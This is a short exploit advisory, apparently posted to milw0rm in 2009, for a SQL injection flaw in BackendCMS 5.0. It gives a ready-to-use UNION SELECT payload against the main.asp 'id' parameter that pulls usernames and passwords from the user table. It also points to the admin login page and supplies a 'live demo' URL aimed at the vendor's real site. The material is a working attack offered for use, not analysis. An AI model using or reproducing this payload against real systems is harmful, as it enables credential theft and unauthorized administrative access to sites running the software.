************************************************************
** BackendCMS Version 5.0 SQl Injection
************************************************************
** Prodcut: BackendCMS Version 5.0
** Home : http://www.backendcms.dk/
** Vunlerability : SQL Injection
** Dork : find it yourself
**
************************************************************
** Discovred by: AnGeL25dZ
** Contact : angel25dz@gmail.com
** *********************************************************
** Greetz to : ALLAH
** All Members of HackTeach
** All Members of http://islam-attack.com
** ra3ch and all my friends ...MOC
**
*************************************************************
******************** SQL Injection **************************
*************************************************************
** Exploit: http://[PATH]/main.asp?id=-1+union+all+select+1,2,brugernavn,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user
**
** Administration Login : http://[path]/admin/
** PS: the number of columns can be different from one site to another
**
****************************************************************
** Live demo : http://www.backendcms.dk/main.asp?id=-1+union+all+select+1,2,brugernavn,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user
# milw0rm.com [2009-04-09]